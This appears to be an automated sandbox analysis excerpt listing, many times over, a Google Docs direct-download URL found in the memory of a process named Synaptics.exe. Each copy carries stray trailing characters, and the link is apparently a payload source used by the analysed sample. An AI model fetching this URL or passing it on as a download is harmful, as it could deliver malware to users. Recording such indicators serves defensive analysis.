                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Ga
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Y
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7ZM
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Zx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7yu
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9fN
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9q
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9x
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:AU
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;M
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?z
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAp.
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAv3a
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCg
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCr
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCz
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDa
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF(
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFA
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2694953008.00000000104BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH-UA-1gv
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIH7
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJC
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJm(J
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK9
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKq
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLo
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNz
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP)
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQS
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQq
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS%
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSY
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTzz
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVl
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWZ
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWz
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZB
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_X
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
